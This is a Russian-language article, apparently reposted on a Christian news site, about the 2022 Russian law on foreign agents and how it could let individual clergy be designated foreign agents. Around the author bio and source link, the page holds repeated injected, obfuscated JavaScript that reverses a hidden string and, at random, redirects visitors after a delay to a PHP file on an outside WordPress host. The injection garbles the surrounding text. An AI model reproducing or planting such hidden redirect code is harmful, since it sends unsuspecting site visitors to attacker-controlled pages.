Священник — иноагент

29 июня 2022 г. Госдума РФ приняла Закон «О контроле за деятельностью лиц, находящихся под иностранным влиянием». Ранее нормы об иностранных агентах содержались в разных законах, теперь же они объедены в один. Новый закон после подписания его Президентом (в чем можно не сомневаться) начнет действовать 1 декабря 2022 года.

Подробно в рамках канала сложно рассказать обо всех положениях принятого закона, тем более, что уже есть много аналитики. Потому остановлюсь на некоторых, которые будут интересны аудитории канала.

1. Иностранный агент — лицо, которое получило поддержку или находится под иностранным влиянием в иных формах и занимается политической деятельностью, ведет целенаправленный сбор сведений в области военной, военно-технической деятельности России, финансирует его или распространяет предназначенные для неограниченного круга лиц сообщений и материалов, участвует в их создании или финансирует распространение или создание таких материалов.
То есть для признания ИА необходимо сочетание двух факторов:

  • поддержка или иностранное влияние в другом виде
  • политическая деятельность или иной вид «иноагентской» деятельности

2. Теперь ИА могут признавать не только при наличии иностранного финансирования, но и при наличии иностранного влияния, определение которого весьма широко.

Под иностранным влиянием понимается предоставление иностранным источником лицу поддержки и (или) оказание воздействия на лицо, в том числе путем принуждения, убеждения и (или) иными способами.

Как видно, перечень влияния открыт. Если, например, получил в подарок от иностранца книгу, вполне себе можно расценить как влияние.

3. Определение политической деятельности также очень широко. Не буду цитировать его здесь полностью, приведу лишь один пример. Согласно закону политической деятельностью также признается «распространение, в том числе с использованием современных информационных технологий, мнений о принимаемых органами публичной власти решениях и проводимой ими политике». В соответствии с этой формулировкой даже хвалебный пост о деятельности органов власти, будет политической деятельностью, что уж говорить о критических постах.

Какая ответственность появляется у иностранного агента

Таким образом, теперь стать иноагентом стало очень просто. Но на расширении основания признания таковым изменения не заканчиваются. Закон содержит перечень ограничений, налагаемых на ИА. Это не только отчетность и маркировка всех своих материалов, но и запреты на участие в определенной деятельности. Например, ИА не могут быть организаторами публичных мероприятий, а также ИА будет не вправе осуществлять просветительскую деятельность в отношении несовершеннолетних или педагогическую деятельность в государственных и муниципальных образовательных организациях. Организации, признанные ИА, также не смогут осуществлять образовательную деятельность в отношении несовершеннолетних. ИА будет запрещено производить информационную продукцию для несовершеннолетних.

В связи с этим хотелось бы напомнить, что еще не так давно Конституционный Суд РФ рассматривал жалобу на нормы законодательства об ИА и вынес Постановление от 8 апреля 2014 г. N 10-П. КС тогда указал: «Соответственно, законодательная конструкция некоммерческой организации, выполняющей функции иностранного агента, не предполагает негативной оценки такой организации со стороны государства, не рассчитана на формирование отрицательного отношения к осуществляемой ею политической деятельности и тем самым не может восприниматься как проявление недоверия или желания дискредитировать такую некоммерческую организацию и (или) цели ее деятельности».

Выводы КС обязательны для всех правоприменителей, в том числе и законодательной власти. Но разве поражение в правах ИА не противоречит указанному выводу КС?

Для религиозных организаций в законе содержится небольшая пилюля – не могут быть признаны ИА религиозные организации, зарегистрированные в установленном законом порядке. Однако теперь ИА могут признаваться и физические лица, поэтому любой гражданин, в том числе и священнослужитель, может удостоиться этого звания в личном качестве.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch.online/tag/sergej-chugunov/» target=»_blank»>Сергей Чугуновадвокат Славянского правового центра. Участник многих судебных процессов, в том числе в высших судебных инстанциях. Автор книг и публикаций по вопросам свободы совести и вероисповедания. Читает лекции в духовных образовательных учреждениях.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch.online/po-novomu-zakonu-svyashhennik-mozhet-byt-inagentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-a-religioznaya-organizacziya-net/» target=»_blank» rel=»noreferrer noopener»>Источник

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4/5

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.